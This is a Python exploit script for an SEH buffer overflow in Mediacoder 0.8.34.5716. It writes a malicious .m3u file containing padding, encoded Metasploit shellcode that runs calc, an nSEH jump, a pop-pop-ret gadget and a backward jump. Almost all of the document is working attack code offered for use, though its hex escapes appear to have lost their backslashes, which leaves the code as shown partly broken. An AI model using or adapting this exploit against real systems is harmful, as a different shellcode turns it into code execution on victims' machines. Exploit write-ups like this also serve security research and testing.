#!/usr/bin/python # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u) # Date: 05/May/2015 # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan # email: kwiha2003 [at ]yahoo [dot] com # Version: 0.8.34.5716 # Tested on: Win XP3 # Vendor: http://www.mediacoderhq.com/ # Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe # Greetz: b33f,corelan,offsec,vulnhub,HUST510 # Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also # avoid a few bad bytes after the "A"s. #!/usr/bin/python buffersize = 853 buffer = ("http://" + "x41" * 256) #Space for shellcode to decode buffer += "x90" * 24 # msfpayload windows/exec CMD=calc R|msfencode -b "x00x0ax0dx20" -t c -e x86/shikata_ga_nai #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1) #unsigned char buf[] = buffer +=("xddxc1xbdxc4x15xfdx3axd9x74x24xf4x5fx29xc9xb1" "x32x31x6fx17x03x6fx17x83x2bxe9x1fxcfx4fxfax69" "x30xafxfbx09xb8x4axcax1bxdex1fx7fxacx94x4dx8c" "x47xf8x65x07x25xd5x8axa0x80x03xa5x31x25x8cx69" "xf1x27x70x73x26x88x49xbcx3bxc9x8exa0xb4x9bx47" "xafx67x0cxe3xedxbbx2dx23x7ax83x55x46xbcx70xec" "x49xecx29x7bx01x14x41x23xb2x25x86x37x8ex6cxa3" "x8cx64x6fx65xddx85x5ex49xb2xbbx6fx44xcaxfcx57" "xb7xb9xf6xa4x4axbaxccxd7x90x4fxd1x7fx52xf7x31" "x7exb7x6exb1x8cx7cxe4x9dx90x83x29x96xacx08xcc" "x79x25x4axebx5dx6ex08x92xc4xcaxffxabx17xb2xa0" "x09x53x50xb4x28x3ex3ex4bxb8x44x07x4bxc2x46x27" "x24xf3xcdxa8x33x0cx04x8dxccx46x05xa7x44x0fxdf" "xfax08xb0x35x38x35x33xbcxc0xc2x2bxb5xc5x8fxeb" "x25xb7x80x99x49x64xa0x8bx29xebx32x57xae") buffer += "x42" * 350 nseh = "xEBx06x90x90" # 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll] seh="xeex04x01x66" #Jump back 603 bytes due to insufficient space for shellcode jmpbck = "xe9xA5xfdxffxff" junk = ("D" * 55) f= open("exploit.m3u",'w') f.write(buffer + nseh + seh + jmpbck + junk) f.close()
